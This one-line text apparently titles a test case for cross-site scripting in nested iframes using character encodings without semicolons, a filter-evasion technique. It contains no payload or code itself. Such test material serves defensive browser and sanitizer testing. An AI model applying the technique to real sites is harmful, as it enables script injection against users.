XSS in an iframe nested in an iframe, with encoded chars without semicolons